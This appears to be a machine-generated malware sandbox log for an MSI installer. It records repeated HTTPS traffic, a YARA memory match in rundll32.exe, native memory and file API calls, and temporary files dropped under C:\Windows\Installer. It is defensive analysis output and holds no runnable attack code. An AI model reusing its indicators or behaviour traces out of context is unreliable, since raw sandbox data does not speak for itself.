                  Source: das.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62326 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62290 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62284
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62412 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62341 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62255 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62315
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62387 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62364 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62318
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62278 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62395
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62396
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62358 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62310
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62278
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62399
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62313
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62314
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62290
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62291
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62272 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62289 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62293
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62300 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62293 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62308 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62321 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62381 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62417 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62329 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62346 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62326
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62315 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62329
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62258 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62286
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62332 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62320
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62395 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62261 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62321
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62289
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62353 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62399 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62408 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62296 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62414 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62286 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62320 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62314 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62337
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62338
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62340 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62339
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62257 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62296
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62297
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62356 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62331
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62332
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62373 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62337 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62379 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62396 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62291 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62274 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62306 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62323 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62348 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62365 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62362 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62348
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62340
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62341
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62263 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62359 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62393 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62344
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62334 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62346
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62347
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62351 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62271 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62265 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62416 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62368 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62380 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62359
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62339 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62259 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62402 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62351
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62394 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62297 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62353
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62354 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62331 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62356
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62357
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62371 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62358
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62304 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62377 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62407 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62371
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62372
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62279 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62404
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62407
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62282 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62408
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62409
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62420 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62357 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62362
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62364
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62365
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62391 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62368
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62402
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62267 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62410 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62380
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62381
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62261
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62273 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62366 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62347 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62414
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62416
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62417
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62389 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62276 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62373
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62404 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62310 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62375
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62255
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62377
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62410
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62257
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62258
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62412
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62259
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62318 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62375 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62409 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62270 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62270
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62272
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62393
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62273
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62394
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62383 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62344 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62304
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62338 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62306
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62313 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62386 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62307
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62308
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62401 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62284 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62263
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62265
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62386
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62387
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62420
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62267
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62300
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62372 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62389
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:62255 version: TLS 1.2
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_169633ac-3
                  Source: rundll32.exe, 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_b5e792e3-e
                  Source: Yara matchFile source: 00000006.00000003.1364766656.0000016AD28E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27DD98E NtAllocateVirtualMemory,6_3_0000016AD27DD98E
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27DD9FE NtOpenFile,6_3_0000016AD27DD9FE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27DDA6E NtProtectVirtualMemory,6_3_0000016AD27DDA6E
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_0000016AD27DDACE NtReadFile,6_3_0000016AD27DDACE
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F282B4 NtFreeVirtualMemory,9_2_00F282B4
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2B388 NtAllocateVirtualMemory,9_2_00F2B388
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F2C704 NtDelayExecution,9_2_00F2C704
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F280B8 RtlInitUnicodeString,NtCreateFile,9_2_00F280B8
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F28240 NtClose,9_2_00F28240
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F281C8 NtWriteFile,9_2_00F281C8
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F301A0 NtFreeVirtualMemory,9_2_00F301A0
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F30130 NtAllocateVirtualMemory,9_2_00F30130
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6a9d65.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9E30.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EBE.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EEE.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F0E.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{68C54E68-8D6C-454F-B2BE-2596868E8867}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F7C.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA029.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI9E30.tmpJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F36A504_2_00F36A50
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6F0324_2_00F6F032
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5C2CA4_2_00F5C2CA
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F692A94_2_00F692A9
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5E2704_2_00F5E270
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F684BD4_2_00F684BD
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5A5874_2_00F5A587
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6D8D54_2_00F6D8D5
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F3C8704_2_00F3C870
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F549204_2_00F54920
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5A9154_2_00F5A915
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F60A484_2_00F60A48
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F39CC04_2_00F39CC0
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F65D6D4_2_00F65D6D
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180055C626_2_0000000180055C62
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180041FEC6_2_0000000180041FEC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CFF86_2_000000018001CFF8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003203C6_2_000000018003203C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800200446_2_0000000180020044
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004C0606_2_000000018004C060
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E0806_2_000000018001E080
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800330886_2_0000000180033088
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F0D06_2_000000018001F0D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D1046_2_000000018001D104
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C1686_2_000000018002C168
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800211886_2_0000000180021188
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800241986_2_0000000180024198
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800221A06_2_00000001800221A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800251B06_2_00000001800251B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800231B86_2_00000001800231B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F1D86_2_000000018001F1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E1D86_2_000000018001E1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D2606_2_000000018001D260
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E2E06_2_000000018001E2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F2E06_2_000000018001F2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003430C6_2_000000018003430C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D3646_2_000000018001D364
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800313886_2_0000000180031388
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002238C6_2_000000018002238C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002539C6_2_000000018002539C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800233A06_2_00000001800233A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800123AC6_2_00000001800123AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800213B46_2_00000001800213B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800243C46_2_00000001800243C4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E3E86_2_000000018001E3E8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E4006_2_000000018002E400
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800324086_2_0000000180032408
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F4486_2_000000018001F448
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D4906_2_000000018001D490
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004249C6_2_000000018004249C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E4F06_2_000000018001E4F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C4F86_2_000000018002C4F8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C5006_2_000000018001C500
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004C5106_2_000000018004C510
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F5506_2_000000018001F550
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E5546_2_000000018002E554
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003356C6_2_000000018003356C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002358C6_2_000000018002358C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D5986_2_000000018001D598
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002159C6_2_000000018002159C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800245AC6_2_00000001800245AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800225BC6_2_00000001800225BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800255CC6_2_00000001800255CC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C6086_2_000000018001C608
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B6206_2_000000018002B620
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F6586_2_000000018001F658
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E65C6_2_000000018001E65C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D6A06_2_000000018001D6A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E6D06_2_000000018002E6D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C7106_2_000000018001C710
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F7606_2_000000018001F760
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800217846_2_0000000180021784
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800247946_2_0000000180024794
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E7A06_2_000000018001E7A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800227A86_2_00000001800227A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D7A86_2_000000018001D7A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800317BC6_2_00000001800317BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800237BC6_2_00000001800237BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800327EC6_2_00000001800327EC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C81C6_2_000000018001C81C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A8386_2_000000018004A838
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F8B86_2_000000018001F8B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E8E46_2_000000018001E8E4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D9006_2_000000018001D900
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C9786_2_000000018001C978
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800229906_2_0000000180022990
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800239A86_2_00000001800239A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800219B06_2_00000001800219B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B9B46_2_000000018002B9B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800249C06_2_00000001800249C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F9C06_2_000000018001F9C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DA086_2_000000018001DA08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EA286_2_000000018001EA28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033A3C6_2_0000000180033A3C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CA806_2_000000018001CA80
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FAC86_2_000000018001FAC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DB106_2_000000018001DB10
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EB586_2_000000018001EB58
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CB886_2_000000018001CB88
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023B946_2_0000000180023B94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021B986_2_0000000180021B98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024BA86_2_0000000180024BA8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180032BB86_2_0000000180032BB8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022BBC6_2_0000000180022BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FBD06_2_000000018001FBD0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180042BFC6_2_0000000180042BFC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180031C086_2_0000000180031C08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DC186_2_000000018001DC18
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EC606_2_000000018001EC60
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CC906_2_000000018001CC90
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180046CAC6_2_0000000180046CAC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FD286_2_000000018001FD28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ED686_2_000000018001ED68
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DD706_2_000000018001DD70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021D846_2_0000000180021D84
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024D946_2_0000000180024D94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022DA46_2_0000000180022DA4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023DC46_2_0000000180023DC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002BDDC6_2_000000018002BDDC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CDE86_2_000000018001CDE8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FE306_2_000000018001FE30
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EE706_2_000000018001EE70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DE746_2_000000018001DE74
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033E986_2_0000000180033E98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CEF06_2_000000018001CEF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180044F386_2_0000000180044F38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FF386_2_000000018001FF38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DF786_2_000000018001DF78
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022F8C6_2_0000000180022F8C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180020FA06_2_0000000180020FA0
